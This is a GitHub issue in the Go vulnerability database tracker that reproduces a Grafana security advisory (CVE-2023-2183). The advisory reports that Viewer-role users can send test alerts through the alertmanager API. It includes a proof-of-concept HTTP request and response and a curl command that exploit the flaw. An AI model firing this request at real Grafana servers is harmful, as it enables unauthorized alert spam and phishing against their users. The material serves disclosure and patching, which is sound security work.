Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

x/vulndb: potential Go vuln in github.com/grafana/grafana: GHSA-cvm3-pp2j-chr3 #1856

Closed
GoVulnBot opened this issue Jun 12, 2023 · 2 comments
Assignees
Labels
excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module.

Comments

@GoVulnBot
Copy link

In GitHub Security Advisory GHSA-cvm3-pp2j-chr3, there is a vulnerability in the following Go packages or modules:

Unit Fixed Vulnerable Ranges
github.com/grafana/grafana 9.5.3 >= 9.5.0, < 9.5.3

Cross references:

See doc/triage.md for instructions on how to triage this report.

modules:
    - module: github.com/grafana/grafana
      versions:
        - introduced: 9.5.0
          fixed: 9.5.3
      packages:
        - package: github.com/grafana/grafana
    - module: github.com/grafana/grafana
      versions:
        - introduced: 9.4.0
          fixed: 9.4.12
      packages:
        - package: github.com/grafana/grafana
    - module: github.com/grafana/grafana
      versions:
        - introduced: 9.3.0
          fixed: 9.3.15
      packages:
        - package: github.com/grafana/grafana
    - module: github.com/grafana/grafana
      versions:
        - introduced: 9.0.0
          fixed: 9.2.19
      packages:
        - package: github.com/grafana/grafana
    - module: github.com/grafana/grafana
      versions:
        - fixed: 8.5.26
      packages:
        - package: github.com/grafana/grafana
summary: 'Grafana has Broken Access Control in Alert manager: Viewer can send test alerts'
description: "### Summary\nGrafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role. \n\n**Reason for the error**: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel. \n\nThis enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.\n\n\n### Details\nThe logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert. \n\nView of the panel for the user in the Viewer role:\n![image](https://user-images.githubusercontent.com/1643385/232904030-e8a8338d-f5e3-4b04-80c3-32f2164a190e.png)\n\nAdmin role - View panel for admin role:\n![image](https://user-images.githubusercontent.com/1643385/232904264-c7aba0a5-0642-496b-998d-d500eb5ead7f.png)\n\nAdmin role - Next step – editing:\n![image](https://user-images.githubusercontent.com/1643385/232904388-ef2ee69e-3ee3-41a9-8687-305886c5c0b9.png)\n\nAdmin role - Additional options:\n![image](https://user-images.githubusercontent.com/1643385/232904480-dd493d34-d66d-47af-ab4f-3273ae8976bc.png)\n\n\n\n### PoC\n\n**HTTP Request by user in role Viewer**\n```\nPOST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1\nHost: xxx\nCookie: grafana_session=xxx\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana\naccept: application/json, text/plain, */*\ncontent-type: application/json\n…\n\n{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<test@example.com>\",\n\"singleEmail\":true},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\n\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com \",\"description\":\"tekst\",\"testowy\":\"test http://example.com\",\n\"more\":\"http://example.com \"},\"labels\":{}}}\n\n```\n\n**HTTP Response:**\n```\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nExpires: -1\nPragma: no-cache\nX-Content-Type-Options: nosniff\nX-Frame-Options: deny\nX-Xss-Protection: 1; mode=block\nDate: Wed, 05 Apr 2023 10:43:00 GMT\nContent-Length: 471\n\n{\"alert\":{\"annotations\":{\"__value_string__\":\"[ metric='foo' labels={instance=bar} value=10 ]\",\"description\":\"tekst\",\n\"more\":\"http://example.com\",\"runbook_url\":\"http://example.com\",\"summary\":\"Notification test\",\n\"testowy\":\"testowy http://example.com\"},\"labels\":{\"alertname\":\"TestAlert\",\"instance\":\"Grafana\"}},\n\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"name\":\"test\",\"uid\":\"ojUhNFL4k\",\"status\":\"ok\"}]}],\n\"notified_at\":\"2023-04-05T12:43:00.1430203+02:00\"}\n\n```\n\n## Result:\nThe attacker can send as a template alert or plain/text.\n\n![image](https://user-images.githubusercontent.com/1643385/232917993-1294cfe0-3040-4d04-a533-a72ecbc666c0.png)\n\n\n### Impact\nAs I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server. \n\nFrom a practical point of view, this means that for each \"GrafanaReceiver\" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged. \n\nCURL example – using a user session in the Viewer role:\n\n```\ncurl -i -s -k -X $'POST' \\\n    -H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \\\"Not:A-Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"112\\\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \\\"macOS\\\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \\\n    -b $'grafana_session=xxx' \\\n    --data-binary $'{\\\"receivers\\\":[{\\\"name\\\":\\\"test\\\",\\\"grafana_managed_receiver_configs\\\":[{\\\"settings\\\":{\\\"addresses\\\":\\\"<test@example.com>\\\",\\\"singleEmail\\\":true\\x0d\\x0a},\\\"secureSettings\\\":{},\\\"type\\\":\\\"email\\\",\\\"name\\\":\\\"test\\\",\\\"disableResolveMessage\\\":false}]}],\\\"alert\\\":{\\\"annotations\\\":{\\\"runbook_url\\\":\\\"http://example.com\\\",\\\"description\\\":\\\"tekst\\\",\\\"testowy\\\":\\\"testowy http://example.com\\\",\\x0d\\x0a\\\"more\\\":\\\"http://example.com\\\"\\x0d\\x0a},\\\"labels\\\":{}}}\\x0d\\x0a' \\\n    $'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'\n```\n\n### Mitigation\n\n1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold. \n2. Check the API for the possibility of accessing this endpoint for other roles than admin\n"
cves:
    - CVE-2023-2183
ghsas:
    - GHSA-cvm3-pp2j-chr3
references:
    - advisory: https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3
    - web: https://nvd.nist.gov/vuln/detail/CVE-2023-2183
    - web: https://grafana.com/security/security-advisories/cve-2023-2183/
    - advisory: https://github.com/advisories/GHSA-cvm3-pp2j-chr3

@neild neild self-assigned this Jun 15, 2023
@neild neild added the excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module. label Jun 15, 2023
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/503837 mentions this issue: data/excluded: batch add 21 excluded reports

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/592761 mentions this issue: data/reports: unexclude 75 reports

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module.
Projects
None yet
Development

No branches or pull requests

3 participants